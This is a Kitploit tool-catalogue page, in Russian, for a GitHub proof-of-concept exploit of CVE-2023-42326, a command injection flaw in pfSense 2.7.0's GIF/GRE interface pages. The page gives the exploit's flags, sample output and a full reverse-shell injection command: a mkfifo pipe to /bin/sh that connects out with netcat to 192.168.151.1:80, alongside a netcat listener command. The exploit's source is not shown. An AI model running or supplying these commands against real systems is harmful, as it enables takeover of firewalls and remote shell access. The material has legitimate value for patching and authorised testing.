Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-42326 — This is a simple POC to for show the pfsense 2.7 Command injection Vulnerability ( CVE-2023-42326) | Kitploit
Инструменты/GitHubGitHub/bl4ckarch/cve-2023-42326
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubbl4ckarch/cve-2023-42326

CVE-2023-42326

This is a simple POC to for show the pfsense 2.7 Command injection Vulnerability ( CVE-2023-42326)

Репозиторий
41 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт внедрения команд в pfSense 2.7.0 (CVE-2023-42326)

Этот скрипт на Python является эксплойтом Proof-of-Concept (PoC) для уязвимости внедрения команд (CVE-2023-42326) в pfSense 2.7.0. Уязвимость позволяет аутентифицированным атакующим внедрять и выполнять произвольные команды через компоненты interfaces_gif_edit.php и interfaces_gre_edit.php.

Возможности

  • Выбор режима эксплойта (gif или gre) для выбора уязвимых компонентов.
  • Возможность внедрения команд для выполнения произвольных shell-команд.
  • Обработка обратной оболочки Netcat с автоматическим управлением потоками.
  • Режим отладки для улучшенной видимости данных запросов.

Предварительные требования

Перед запуском скрипта убедитесь, что у вас есть:

  • Установленный Python 3.x в вашей системе.
  • Установленные необходимые библиотеки Python:
    root@kitploit:~
    pip install requests beautifulsoup4 rich
    

Использование

Базовый пример (внедрение команд)

Эта команда внедряет shell-команду, которая создает обратную оболочку к вашей машине:

root@kitploit:~
python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &"
  • -u: Имя пользователя для входа администратора pfSense.
  • -p: Пароль для входа администратора pfSense.
  • --mode: Режим эксплойта (либо gif, либо gre).
  • -t: Целевой URL pfSense.
  • -c: Shell-команда для внедрения.
  • -d: (Опционально) Включить режим отладки для просмотра необработанных данных ответа.

Пример обратной оболочки

Убедитесь, что на вашей машине запущен слушатель Netcat:

root@kitploit:~
nc -lvnp 80

Затем запустите скрипт с командой обратной оболочки, например:

root@kitploit:~
python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &"  --insecure(for https without valid ssl)

Демонстрационные GIF

  1. Вход в pfSense и эксплуатация интерфейса GIF

    Демо 1 - Интерфейс GIF

  2. Выполнение обратной оболочки

    Демо 2 - Обратная оболочка

Параметры скрипта

Пример вывода

При успешном выполнении эксплойта вы должны увидеть вывод, похожий на этот:

root@kitploit:~
██████╗ ███████╗██████╗ ██╗    ██╗███╗   ██╗███╗   ███╗███████╗
██╔══██╗██╔════╝██╔══██╗██║    ██║████╗  ██║████╗ ████║██╔════╝
██████╔╝█████╗  ██████╔╝██║ █╗ ██║██╔██╗ ██║██╔████╔██║█████╗  
██╔═══╝ ██╔══╝  ██╔═══╝ ██║███╗██║██║╚██╗██║██║╚██╔╝██║██╔══╝  
██║     ██║     ██║     ╚███╔███╔╝██║ ╚████║██║ ╚═╝ ██║███████╗
╚═╝     ╚═╝     ╚═╝      ╚══╝╚══╝ ╚═╝  ╚═══╝╚═╝     ╚═╝╚══════╝

Done with ❤️  by @bl4ckarch                                                            
[2024-10-24 03:57:59] [SUCCESS] Target http://10.101.1.1 is reachable
[2024-10-24 03:57:59] [INFO] Fetching CSRF token from: http://10.101.1.1/
[2024-10-24 03:57:59] [SUCCESS] CSRF token extracted successfully
[2024-10-24 03:57:59] [INFO] Sending GIF exploit request to http://10.101.1.1/interfaces_gif_edit.php
[2024-10-24 03:57:59] [SUCCESS] GIF Exploit sent successfully

Примечания

  • Требования к привилегиям: У вас должны быть действительные учетные данные администратора для экземпляра pfSense.
  • Целевая система: Этот эксплойт специфичен для pfSense 2.7.0.
  • Обратная оболочка: Убедитесь, что настройки брандмауэра разрешают входящие соединения на указанном порту при настройке обратной оболочки.

Режим отладки

Если вы хотите увидеть больше деталей об отправляемых запросах, вы можете включить режим отладки, добавив -d в вашу команду. Это выведет данные ответа и поможет устранить любые проблемы.

root@kitploit:~
python3 exploit.py -u "admin" -p 'pfsense' --mode 'gif' -t http://10.101.1.1 -c "your_command_here" -d --insecure(for https without valid ssl)

Устранение неполадок

  • Убедитесь, что целевая система доступна.
  • Перепроверьте учетные данные, используемые для входа.
  • Используйте флаг -d для более детального логирования при необходимости.
Скачать инструмент
АргументОписание
-uИмя пользователя для входа администратора pfSense.
-pПароль для входа администратора pfSense.
-tЦелевой URL/IP-адрес pfSense (например, http://10.101.1.1).
--modeРежим эксплойта: gif (для interfaces_gif_edit.php) или gre.
-cКоманда для внедрения в уязвимый компонент.
-dОпционально. Включить режим отладки для вывода данных ответа.